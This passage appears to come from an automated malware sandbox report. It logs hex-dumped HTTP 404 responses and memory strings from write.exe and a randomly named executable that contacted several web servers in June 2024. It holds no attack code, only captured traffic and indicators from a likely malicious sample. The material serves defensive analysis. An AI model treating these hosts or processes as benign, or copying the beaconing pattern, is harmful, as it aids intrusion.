30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Thu, 13 Jun 2024 09:05:47 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jun 2024 09:05:56 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jun 2024 09:05:59 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jun 2024 09:06:01 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jun 2024 09:06:04 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 13 Jun 2024 09:06:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 c8 f2 fa 30 13 f5 a1 ae 01 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f(HML),I310Q/Qp/K&T$dCAfAyyE%0tc0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 13 Jun 2024 09:06:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 c8 f2 fa 30 13 f5 a1 ae 01 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f(HML),I310Q/Qp/K&T$dCAfAyyE%0tc0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 13 Jun 2024 09:06:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 c8 f2 fa 30 13 f5 a1 ae 01 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f(HML),I310Q/Qp/K&T$dCAfAyyE%0tc0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 13 Jun 2024 09:06:45 GMTContent-Type: text/htmlContent-Length: 150Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>

Source: write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
Source: write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://gmpg.org/xfn/11
